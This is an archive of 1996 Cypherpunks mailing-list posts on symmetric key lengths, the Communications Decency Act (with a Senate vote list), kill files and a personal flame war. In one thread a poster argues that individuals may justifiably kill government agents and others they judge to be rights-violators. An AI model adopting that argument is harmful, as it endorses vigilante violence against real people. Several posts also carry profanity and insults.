Subject: Re: Report available: "Minimal Key Lengths for Symmetric Ciphers"
In-Reply-To: <199602081528.KAA11525@light.lightlink.com>
Message-ID: <199602090057.TAA07854@redwood.skiles.gatech.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I downloaded this so-called "report". It doesn't even mentions PGP.
> Gotta wonder why the 007 wannabe "experts" and the Big Business (BSA)
> want you to only use 90 bits for your keys and why they've never heard
> of PGP...
> 
> Anyone who listens to crypto advice from people who's purpose in life
> is to listen to *YOU* gets what they deserve. I'll stay with PGP which
> has a 2048 bit key.

The group of 7 in question are definitely not `wannabes'.  They are
about as knowledgeable a group as you could find outside of the NSA.

The report discussed the length of key needed for *symmetric*
crytosystems.  As this pertains to PGP, it uses a 128 bit session key
for the IDEA symmetric algorithm.  Not 2048.

Their recommendation was for a *minimum* of 90 bit keys for data
that must remain private for any length of time.  Given the calculations
they stated, this seems reasonable.

Richard Coleman
coleman@math.gatech.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: avatar@mindspring.com
Date: Sat, 10 Feb 1996 18:12:00 +0800
To: sighpsi@alpha.c2.org
Subject: Re: OK, here's what's wrong.
Message-ID: <199602090105.UAA08342@borg.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:55 PM 2/8/96 -0800, you wrote:
><snips>
>
>>Tell me whats wrong with this section of the telecom bill.  I have a six
>>year old boy I am trying to raise
>>and it is hard enough to teach him respect and values without explaining why
>>Ned Beatty is being
>>bungholed in the woods by Billy Bob or why the Terminator splattered this
>>guys brains all over the
>>wall.  
>>        Tell me why parents should not be able to censor their OWN
>>television so that they may raise their children the way THEY see
>>fit...................Did your dad give you his old
>>playboys?.........NOOOOO............
>>Did he take you down to your grandmothers autopsy before her
>>funeral?...................I Don't Think So.....
>
>Agreed. And the government didn't have to force him.
>
>>        Honestly, don't you believe that what a child is exposed to effects
>>his judgement, perception,
>> attitude,and character??
>
>Yes.
>
>>All I'm saying is it's tough to raise a child these days without the added
>>distortion of modern 
>>programing and parents need not be denied any tool that can help them
>>achieve success.
>
>Agreed, the question is, should the "V." chip be forced in, by government,
>or should free-market demand, like your very eloquent demand above, be the
>engine. I choose the free market. I might think differently about child-
>rearing than you. I may want my kid to see violence or sex, or I may just
>not want him/her to see both together. I may want him/her to see the truth
>about history and hemp, and you may not. That's the point of a free society,
>I don't get to affect your kid's upbringing, and you don't effect mine. The
>problems come in when something is forced instead of being allowed to develop
>naturally in the marketplace ecosystem. In the ecosystem, there would be 
>multiple systems and multiple standards of what is "indecent." Filtering
>services would flourish, without taxing me. In a coercive government system,
>I am forced to buy a TV whith a goddam chip I will never use (no kid) and
>there is one standard, and I get taxed.
>
>
>>                (3) The average American child is exposed to 25 hours of
>>              television each week and some children are exposed to as much 
>>              as 11 hours of television a day.
>
>My parents limited me to 1hr / day, after homework, I chose what to view.
>[But I turned into a guy who is a cypherpunk, likes nice blowjobs, reads
>Playboy, smokes cigars, etc., so what did they know? <g>

Nuff said, point taken. 
>
>
>
>>                (6) Studies indicate that children are affected by the
>>              pervasiveness and casual treatment of sexual material on
>>              television, eroding the ability of parents to develop
>>              responsible attitudes and behavior in their children.
>
>So get rid of your TV altogether! [Some really do, with excellent results.]

Agreed.
>
>>                (7) Parents express grave concern over violent and sexual
>>              video programming and strongly support technology that would
>>              give them greater control to block video programming in the 
>>              home that they consider harmful to their children.
>
>So obviously, the free-marketplace won't work here.

Your right again.

>>                (8) There is a compelling governmental interest in empowering
>>              parents to limit the negative influences of video programming
>>              that is harmful to children.
>
>There is compelling individual interest in being left alone and taxed less.

And again.

>>                (9) Providing parents with timely information about the 
>>              nature of upcoming video programming and with the technological
>>              tools that allow them easily to block violent, sexual, or other
>>              programming that they believe harmful to their children is a
>>              nonintrusive and narrowly tailored means of achieving that
>>              compelling governmental interest.
>
>And the marketplace will never do _that_!

Alright,  Alright already, I can admit
defeat..................................Which is more than I can say for
most of us.

>[Sorry I must be as sarcastic as I am, it's a symptom of Libertarianism;)]
>
>PS -- Much better .sig.
THANX
>Sighpsi.
>
>Thanks for your point of veiw.
Charles Donald Smith Jr.

||The government  is my shepherd I need not work. It alloweth me to lie
 down on a good job. It leadeth me beside stilled factories. It destroyeth
 my initiative. It leadeth me in the path of a parasite for politics sake. YEA,
 though I walk through the valley of laziness and deficet spending I shall
 fear no evil, for the government is with me. It prepareth an economic utopia
 for me by appropriating the earnings of my grandchildren. It filleth my head
 with false security. My inefficiency runeth over. Surely, the government 
should care for me all the days of my life, and I will dwell in a fools paradise
forever.................AMEN!   || nuke'm if ya got'em||





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Sat, 10 Feb 1996 18:09:22 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Free Speech Mirrors hit Toronto Star
In-Reply-To: <199602082158.QAA22922@opine.cs.umass.edu>
Message-ID: <Pine.OSF.3.91.960208195039.12247C-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 8 Feb 1996 lmccarth@cs.umass.edu wrote:

> Tim Philp writes:
> > 	Canada's largest newspaper, The Toronto Star today published an
> > account of the Ernst Zundel affair in the Fast Forward Section of the
> > paper. Net columnist K. K. Campbell, in what looks like a 1500 word
> > article, (I didn't count them) gives a good account of the German attempt
> > to censor the Internet. He even mentions the fact that the MIT mirror was
> 							 ~~~~~~~~~~~~~~~~~~
> > ordered removed, but gives no details.
>   ~~~~~~~~~~~~~~~
> 
> Is this a reporting error, or did I miss something ?
> 

The paragraph in question was as follows:

"The EFC says at least 10 mirrors sites have appeared, including ones at 
Carnegie Mellon University, Stanford University, and MIT. (The one at the 
University of Massachusetts was ordered removed.)"

I don't know the truth of this statement but the article was very 
anti-censorship and struck a pro-freedom stance.

K.K. Campbell, the author of the piece, is eye weekly's net.editor and 
Webmaster (http://www.interlog.com/eye)

Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Sat, 10 Feb 1996 17:58:30 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Free Speech Mirrors hit Toronto Star
In-Reply-To: <Pine.OSF.3.91.960208195039.12247C-100000@nic.wat.hookup.net>
Message-ID: <199602090106.UAA03245@themis.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim Philp writes:
> The paragraph in question was as follows:
> 
> "The EFC says at least 10 mirrors sites have appeared, including ones at 
> Carnegie Mellon University, Stanford University, and MIT. (The one at the 
> University of Massachusetts was ordered removed.)"

OK, this clears it up. MIT != University of Massachusetts




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 10 Feb 1996 23:16:14 +0800
To: cypherpunks@toad.com
Subject: Kill Files and Plonking
Message-ID: <ad3ff29d27021004b8a7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



A predictable round of "Public Plonkings" and "You're in my kill file,
nyah, nyah, nyah!" postings.

Personally, I regret ever mentioning adding anyone to my filter file, as it
then generated the expected "But Tim won't see this...." nonsense. I
shouldn't have done it. Public plonkings rarely accomplish anything.

I move names and topics in and out of my filter files as the mood strikes
me. I have the option of looking at the mail that's ended up in one of my
various filter files, and deciding to move someone out of that file and
back into the main list file.

(With Eudora, I filter _every_ incoming message into one of a dozen or so
files. It's just a question of which one. For a few really obnoxious
people, I filter their stuff into Eudora's "Trash" file; when I empty the
trash (Macintosh TM), their message is irretrievably gone.)

I think it's best _not_ to publicize who is in one's filter or kill file
for a couple of reasons:

1. It cuts down on the acrimonious plonkings and couter-plonkings.

2. It leaves open the door for gracefully reversing the process.

3. The filtered or killfiled person never really knows if he's being
filtered, so there's a "random reinforcement" element which may, I am
guessing, have an effect on posts.

To satisfy any curiousity aroused, at this moment there are 12 names which
I filter into a file called "Kill File" (but which is persistent, and can
be looked at by me at any time) and only 2 names which I filter into
"Trash" (which gets emptied fairly often, usually without my having looked
to see what went into it). (No name I have ever mentioned publically in
this context is in this Trash file.)

Some people who write to me and get no response may of course be left
wondering....this is the beauty of random reinforcement.

--Tim


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Sat, 10 Feb 1996 11:34:01 +0800
To: cjs@netcom.com (cjs)
Subject: Re: CDA; Don't get mad, get even!
Message-ID: <v01530502ad4078856c0f@[204.179.169.87]>
MIME-Version: 1.0
Content-Type: text/plain


>I think that we should make an example of those responsible for the
>CDA. Ignorance is really not an excuse here, because whoever voted for
>for the bill should have known the CDA was attached to it, and should
>have had some idea of what it did.
>
>Lets get a list of whos supporting this thing and bad press them back
>before the dawn of time.

Here's the votes from the Senate.  I'll look for the House and get back.

Forwarded message from Voter Tellecommunications Watch follows:
\/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/
Senate Response on the CDA (Communications Decency Act)
Where to find this information
You can get this file by sending mail to vtw@vtw.org
with "send response" in the subject line of the message.
To receive VTW alerts via email, send a message to listproc@vtw.org
with "subscribe vtw-announce firstname lastname" in the body of the
message..  You can also get this file at
URL:http://www.panix.com/vtw/exon/senate-response.html.


Urgent news
The Senate has passed the Communications Decency Act.  The vote
breakdown is below.


The tally of the 6/14/95 vote on the Communications Decency Act

Senators who voted to defeat the Communications Decency Act
(A polite letter to congratulate them for defending your free speech
 rights would be appropriate.)

      D ST Name (Party)               Phone           Fax
      = == ==================         ==============  ==============
      D CT Lieberman, Joseph I.       1-202-224-4041  1-202-224-9750
      D DE Biden Jr., Joseph R.       1-202-224-5042  1-202-224-0139
      D IL Simon, Paul                1-202-224-2152  1-202-224-0868
                                        senator@simon.senate.gov
      D IL Moseley-Braun, Carol       1-202-224-2854  1-202-224-2626
      D MA Kennedy, Edward M.         1-202-224-4543  1-202-224-2417
                                        senator@kennedy.senate.gov
      D MI Levin, Carl                1-202-224-6221  na
      D MN Wellstone, Paul            1-202-224-5641  1-202-224-8438
      D NM Bingaman, Jeff             1-202-224-5521  na
                                        Senator_Bingaman@bingaman.senate.gov
      D NY Moynihan, Daniel P.        1-202-224-4451  na
      D OH Glenn, John                1-202-224-3353  1-202-224-7983
      R RI Chafee, John H.            1-202-224-2921  na
      D VA Robb, Charles S.           1-202-224-4024  1-202-224-8689
                                        Senator_Robb@robb.senate.gov
                                        vascr@CapAccess.org
      D VT Leahy, Patrick J.          1-202-224-4242  1-202-224-3595
                                        senator_leahy@leahy.senate.gov
      R VT Jeffords, James M.         1-202-224-5141  na
      D WA Murray, Patty              1-202-224-2621  1-202-224-0238
      D WI Feingold, Russell          1-202-224-5323  na
                                        russell_feingold@feingold.senate.gov


Senators who voted to support the (CDA) Communications Decency Act
(They voted for the CDA and to curtail your free speech rights.
 Writing them an impolite and nasty letter would be a bad idea, and
 may soon be illegal under the CDA anyway.  Take some time to cool down.)

      D ST Name (Party)               Phone           Fax
      = == ==================         ==============  ==============
      R AK Murkowski, Frank H.        1-202-224-6665  1-202-224-5301
      R AK Stevens, Ted               1-202-224-3004  1-202-224-1044
      D AL Heflin, Howell T.          1-202-224-4124  1-202-224-3149
      R AL Shelby, Richard C.         1-202-224-5744  1-202-224-3416
      D AR Bumpers, Dale              1-202-224-4843  1-202-224-6435
      D AR Pryor, David               1-202-224-2353  1-202-224-8261
      R AZ Kyl, Jon                   1-202-224-4521  1-202-228-1239
      R AZ McCain, John               1-202-224-2235  1-602-952-8702
      D CA Boxer, Barbara             1-202-224-3553  na
      D CA Feinstein, Dianne          1-202-224-3841  1-202-228-3954
      R CO Campbell, Ben N.           1-202-224-5852  1-202-225-0228
      R CO Brown, Henry               1-202-224-5941  1-202-224-6471
      D CT Dodd, Christopher J.       1-202-224-2823  na
      R DE Roth Jr.  William V.       1-202-224-2441  1-202-224-2805
      D FL Graham, Robert             1-202-224-3041  1-202-224-2237
      R FL Mack, Connie               1-202-224-5274  1-202-224-8022
      D GA Nunn, Samuel               1-202-224-3521  1-202-224-0072
      R GA Coverdell, Paul            1-202-224-3643  1-202-228-3783
      D HI Akaka, Daniel K.           1-202-224-6361  1-202-224-2126
      D HI Inouye, Daniel K.          1-202-224-3934  1-202-224-6747
      D IA Harkin, Thomas             1-202-224-3254  1-202-224-7431
      R IA Grassley, Charles E.       1-202-224-3744  1-202-224-6020
      R ID Craig, Larry E.            1-202-224-2752  1-202-224-2573
      R ID Kempthorne, Dirk           1-202-224-6142  1-202-224-5893
      R IN Coats, Daniel R.           1-202-224-5623  1-202-224-8964
      R IN Lugar, Richard G.          1-202-224-4814  1-202-224-7877
      R KS Dole, Robert               1-202-224-6521  1-202-224-8952
      R KS Kassebaum, Nancy L.        1-202-224-4774  1-202-224-3514
      D KY Ford, Wendell H.           1-202-224-4343  1-202-224-0046
      R KY McConnell, Mitch           1-202-224-2541  1-202-224-2499
      D LA Breaux, John B.            1-202-224-4623  na
      D LA Johnston, J. Bennett       1-202-224-5824  1-202-224-2952
      D MA Kerry, John F.             1-202-224-2742  1-202-224-8525
      D MD Mikulski, Barbara A.       1-202-224-4654  1-202-224-8858
      D MD Sarbanes, Paul S.          1-202-224-4524  1-202-224-1651
      R ME Snowe, Olympia             1-202-224-5344  1-202-224-6853
      R ME Cohen, William S.          1-202-224-2523  1-202-224-2693
      R MI Abraham, Spencer           1-202-224-4822  1-202-224-8834
      R MN Grams, Rod                 1-202-224-3244  na
      R MO Bond, Christopher S.       1-202-224-5721  1-202-224-8149
      R MO Ashcroft, John             1-202-224-6154  na
      R MS Cochran, Thad              1-202-224-5054  1-202-224-3576
      R MS Lott, Trent                1-202-224-6253  1-202-224-2262
      D MT Baucus, Max                1-202-224-2651  na
      R MT Burns, Conrad R.           1-202-224-2644  1-202-224-8594
      R NC Faircloth, D. M.           1-202-224-3154  1-202-224-7406
      R NC Helms, Jesse               1-202-224-6342  1-202-224-7588
      D ND Conrad, Kent               1-202-224-2043  1-202-224-7776
      D ND Dorgan, Byron L.           1-202-224-2551  1-202-224-1193
      D NE Kerrey, Bob                1-202-224-6551  1-202-224-7645
      D NE Exon, J. J.                1-202-224-4224  1-202-224-5213
      R NH Gregg, Judd                1-202-224-3324  1-202-224-4952
      R NH Smith, Robert              1-202-224-2841  1-202-224-1353
      D NJ Bradley, William           1-202-224-3224  1-202-224-8567
      D NJ Lautenberg, Frank R.       1-202-224-4744  1-202-224-9707
      R NM Domenici, Pete V.          1-202-224-6621  1-202-224-7371
      D NV Bryan, Richard H.          1-202-224-6244  1-202-224-1867
      D NV Reid, Harry                1-202-224-3542  1-202-224-7327
      R NY D'Amato, Alfonse M.        1-202-224-6542  1-202-224-5871
      R OH Dewine, Michael            1-202-224-2315  1-202-224-6519
      R OK Inhofe, James              1-202-224-4721
      R OK Nickles, Donald            1-202-224-5754  1-202-224-6008
      R OR Hatfield, Mark O.          1-202-224-3753  1-202-224-0276
      R OR Packwood, Robert           1-202-224-5244  1-202-228-3576
      R PA Santorum, Rick             1-202-224-6324  na
      R PA Specter, Arlen             1-202-224-4254  1-717-782-4920
      D RI Pell, Claiborne            1-202-224-4642  1-202-224-4680
      D SC Hollings, Ernest F.        1-202-224-6121  1-202-224-4293
      R SC Thurmond, Strom            1-202-224-5972  1-202-224-1300
      D SD Daschle, Thomas A.         1-202-224-2321  1-202-224-2047
      R SD Pressler, Larry            1-202-224-5842  1-202-224-1259*
      R TN Thompson, Fred             1-202-224-4944  1-202-228-3679
      R TN Frist, Bill                1-202-224-3344  1-202-224-8062
      R TX Hutchison, Kay Bailey      1-202-224-5922  1-202-224-0776
      R TX Gramm, Phil                1-202-224-2934  1-202-228-2856
      R UT Bennett, Robert            1-202-224-5444  1-202-224-6717
      R UT Hatch, Orrin G.            1-202-224-5251  1-202-224-6331
      R VA Warner, John W.            1-202-224-2023  1-202-224-6295
      R WA Gorton, Slade              1-202-224-3441  1-202-224-9393
      D WI Kohl, Herbert H.           1-202-224-5653  1-202-224-9787
      D WV Byrd, Robert C.            1-202-224-3954  1-202-224-4025
      D WV Rockefeller, John D.       1-202-224-6472  na
      R WY Simpson, Alan K.           1-202-224-3424  1-202-224-1315
      R WY Thomas, Craig              1-202-224-6441  1-202-224-3230



Voters Telecommunications Watch / vtw@vtw.org

.

lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBvAzD3EHEAAAEDAMVwZzXozPjX18mCenA5fJsdWZXcrhJCxPR+SoVCmR7d4ZVU
mwITzPTHo/GyLvJrWyk5YdhheczyY2VSawaMrCN/nWA7K9lwAylbKyPxqBhRYJ3C
2wi2uD5LY2wypNOQyQARAQABtB5KZWZmIENvbm4gPGx1bmFzbGlkZUBsb29wLmNv
bT6JAHUDBRAw+1bqS2NsMqTTkMkBAQkTAwCersFbCyk8O0MbGlNcZDAe24CLEWQ0
0C5EHni33W76UsG1bybcLsuMH6HVwLF7IqZivnzc7wkujYPQvCqn8HEYYTld8V9V
Cou4dOvA8kV7rHvAn/LuLx7DRruLFrRoPSk=
=OIT9
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 10 Feb 1996 18:12:20 +0800
To: ravage@ssz.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <01I0ZF581Y8WA0UTTU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"ravage@ssz.com"  "Jim Choate"  7-FEB-1996 01:02:52.78

>> 	If someone has comitted serious enough violations of rights in the
> past, then I would call killing that person justified. First, it prevents any

Who defines what the rights are? How are the standards to be applied?
Self-defence by the person being killed is not ruled out. 
--------------
	Ultimately, as any other system decides whether rights have been
violated. Individual determination, no matter how much the cops and courts may
claim they're just following the law, is in the end the deciding factor in how
they behave. In other words, each person must decide what rights exist. If that
person sees another violating those rights, then they ethically must try to do
something about the rights-violator - to stop them at the bare minimum.
Solutions which also serve the functions of justice (retribution) and
discouragement are optimal.
-------------

>It also prevents any understanding of what caused that individual to act the
way they did. It also prevents any chance of repentance or growth. It also
leaves any question of a mistake moot. I personaly don't want to live in a
society where by any stretch of the imagination some group of strangers
decide if I live or die. This is ultimately the basic human right. If you
seriously support this then it is unreasonable for you to support freedom of
speech and the elimination of federal intrusions into it. Killing a person
is a very effective method to silence speech. If it is a right then no
amount of people are sufficient to take it from you. I don't want my
great-great-great-grandchildren to live in that kind of world either.
-----------
	The mistake one is a problem. There are some cases, though, in which
the evidence tends to be pretty clear... and those tend to be the ones in which
the person thinks they're justified, or claims as much. These tend to be
the governmental cases. Regarding restrictions of rights, if someone
violates the rights of another, it is right to take away (permanently or
temporarily) some of their rights. First, it is necessary in order to prevent
further violations - a variety of self-defense. Second, it is just retribution.
Third, the manner of such punishment may be chosen to serve as a
discouragement; while it would not be right to chose to punish someone on this
basis alone, one may consider it when deciding on details.
	If you don't agree with the above, how do you justify violating
someone's rights in self-defense? Shooting them for trying to kill you
definitely prevents their speech, for instance. The concept in question is
just a temporally altered version.
------------

>> people in question- government agents, etcetera- are generally a bit
> different than the gang members who so regularly ignore prison sentences
> and the death penalty.)

I disagree strongly with this. Historicaly those gang members have risen to
become the government. It occurs often enough to clearly indicate that
groups in concert tend to behave the same way toward outsiders. It is a
function of human psychology.
-----------
	You're vastly oversimplifying the motivations of the people in
government. They can be divided into two basic groups; the ones who believe in
a cause, and the ones who just want power. The first can only be stopped by
death when their cause is wrong, although if the cause itself is not wrong but
their method of gaining it is, they should be discouragable from using certain
methods. The second are quite discouragable - they don't have much power when
they're dead.
----------

>> Third, and getting away from the self-defense argument, it is
> justice.

Whose justice? The victims? Does it bring them justice or just ease your
feelings of threat? Would you feel justified? I would feel guilty being
involved in any manner with the death of another human being. For me, life
is the ultimate treasure (hoaky as that may be), no body irrispective of
quantity is wise enough to decide that question in any situation. 
-------------
	Justice in the sense of balancing the scales. If one person has taken
away from the rights of another, it is balanced to take away that first
person's rights to compensate. They caused another to lose freedom; now they
will have their freedom limited.
-------------

>> >How many people have to decide that another should be killed for it to be
> ethical? In short, how many people does it take to decide it is a legitimate
> act to take your own life?
> ----------------------
> 	Why should "how many people" make a difference?

A democracy consists of groups acting in concert in various sizes toward a
quasi-shared mental model. The majority rule is a basic tenent of government
theory. The current system says 12 people are sufficient to decide a persons
life. Is 12 strangers sufficient to decide your life? I don't think they are
sufficient to decide mine.
----------
	I don't really care whether majority rule is a basic tenent of
government theory (it isn't, aside from studies of democracies). It's all up
to each individual anyway. Democracy is bullshit (fuck Exon and the CDA).
	Since you left me with a "thought question" that I've tried to answer,
I'll leave you with one. Were the assasination attempts on Hitler justified?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Sat, 10 Feb 1996 23:29:39 +0800
To: cypherpunks@toad.com
Subject: [NOISE]More meaty CDA material
Message-ID: <v01540b20ad408261eff2@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded:

The article starts with "SAN ANTONIO, Texas -- You motherfuckers in
Congress have dropped
over the edge of the earth this time." and gets better.

>The American Reporter, working in conjunction with other groups opposed
>to the CDA, commissioned a writer to produce a special article to
>celebrate Clinton's signing of the new the law.
>
>Steve Russell, the author, retired after 16 years as a trial judge
>in Texas and is an Assistant Professor of Criminal Justice at the
>University of Texas at San Antonio.
>
>This article was specifically and carefully designed to be completely
>and utterly in breach of the CDA. If you are opposed to the CDA and
>you are not offended by the "seven bad words", you'll probably find
>it highly entertaining and insightful.
>
>OTOH, if you are easily offended and don't like bad language, JUST
>DON'T READ IT.
>
>If you are easily offended and like to be offended and then like to
>file Police Reports, please go ahead. After all it was written to
>help ensure that the CDA gets challenged in the courts as soon as
>possible.
>
>Here's the URL and don't tell me I didn't warn you:
>
>http://www.newshare.com/Reporter/today.html
>
>
>--
>|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
>| Malcolm Hoar           "The more I practice, the luckier I get". |
>| malch@malch.com                                     Gary Player. |
>| http://www.malch.com/               Shpx gur PQN.                |
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 9 Feb 1996 11:50:51 +0800
To: cypherpunks@toad.com
Subject: Blue Ribbons
Message-ID: <2.2.32.19960208145144.00699838@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

For as long as my 10-yard spool of blue ribbon and box of paperclips hold out, I'm sending a ribbon/paperclip to any snailmail address in the U.S.

Note that each one is an individually hand-crafted work of art :-)

Dave Merriman
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRnw4cVrTvyYOzAZAQGXUQP/fu7/K7dkjSkbcDAgrOmVNH0OaUn6t5SP
E6DKfyfz3Wlu2VIhxCAS0KGHaLdCSH1teGFfIuhwOWikq+FdidJjXjep04/MAuAe
+KXI0QoaFYY4dVVi9qX8Uzz1igOHs2MXDXG/6eZ1AlSux+HG1DHPz44PyUY7flWP
sVizJ7plH2w=
=qrdr
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geocities.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sun, 11 Feb 1996 19:38:51 +0800
To: perry@piermont.com
Subject: Re: In Re: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
In-Reply-To: <199602090206.VAA09894@jekyll.piermont.com>
Message-ID: <199602090303.WAA00539@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> So, Ed Carp couldn't leave well enough alone. I killfiled him and
> apparently he had the bad taste to send me some mail about it, and

Actually, I hit 'g' instead of 'r', so the response seen here was posted 
also.  Perry distorts.

> when my robot replied to him informing him that I had no interest in
> whatever he might have had to say, he seems to have a desperate need
> to get in the last word by forwarding the message from my robot to the
> mailing list.

Actually, I thought it would be instructive as to the rather, err, unique 
wording of Perry's robot.  I've seen a lot funnier, though?

> Mr. Carp, you've got extremely bad taste. Luckily, I don't have to
> ever see anything you have to say ever again.

Why, thank you, Perry!  I'll be sure to mention the fact that you think I 
have bad ... excuse me, "extremely bad taste" in my next performance 
review.  I'm sure it will affect the outcome immeasurably. ;)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring
----------------------------------------------------------------------
According to the Communications Decency Act, these are the words you may
no longer use in your Internet correspondence:  Shit, piss, fuck, cunt,
cock-sucker, mother-fucker and tits. The use of shit, piss, fuck, cunt,
cock-sucker, mother-fucker and tits, may now earn you a substantial fine
as well as possible jail time, should President Clinton sign this Bill
into law.  Please refrain from using shit, piss, fuck, cunt, cock-sucker,
mother-fucker and tits, to protect your children as well as others, from
their evil influence, thus keeping America "ideologically pure".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 9 Feb 1996 10:54:42 +0800
To: cypherpunks@toad.com
Subject: Re: In Re: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
In-Reply-To: <199602081935.OAA08993@jekyll.piermont.com>
Message-ID: <199602090206.VAA09894@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



So, Ed Carp couldn't leave well enough alone. I killfiled him and
apparently he had the bad taste to send me some mail about it, and
when my robot replied to him informing him that I had no interest in
whatever he might have had to say, he seems to have a desperate need
to get in the last word by forwarding the message from my robot to the
mailing list.

Mr. Carp, you've got extremely bad taste. Luckily, I don't have to
ever see anything you have to say ever again.

Perry


"Perry's Mail Filter" writes:
> 
> I am sorry, but your message with the Subject:
> 
> 	Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd) 
> 
> was rejected by Perry Metzger's mail filter and will not be read by
> him. This is likely because Perry decided to place you on his reject
> list. Perry tends to clean out his filter lists every six months, so
> you may be able to send him electronic mail again sometime in the
> future.
> 
> If you absolutely need to contact Perry, please use means other than
> electronic mail, or ask a third party to contact him on your behalf.
> 
> You will not receive further copies of this notice.
> 
> Perry's Mail Filter
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Fri, 9 Feb 1996 12:02:14 +0800
To: cypherpunks@toad.com
Subject: Perry's whining
Message-ID: <199602090321.WAA02247@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


Why doesn't Perry just shut the hell up?  I've got more important things 
to worry about than Perry's ignorant, fetid whining.  Such as that CDA 
thing in the Telecommunications Bill.

Anyone for suing Bill?
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring
----------------------------------------------------------------------
According to the Communications Decency Act, these are the words you may
no longer use in your Internet correspondence:  Shit, piss, fuck, cunt,
cock-sucker, mother-fucker and tits. The use of shit, piss, fuck, cunt,
cock-sucker, mother-fucker and tits, may now earn you a substantial fine
as well as possible jail time, should President Clinton sign this Bill
into law.  Please refrain from using shit, piss, fuck, cunt, cock-sucker,
mother-fucker and tits, to protect your children as well as others, from
their evil influence, thus keeping America "ideologically pure".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sat, 10 Feb 1996 11:20:09 +0800
To: cypherpunks@toad.com
Subject: Re: Perry's whining, Ed's Sniveling
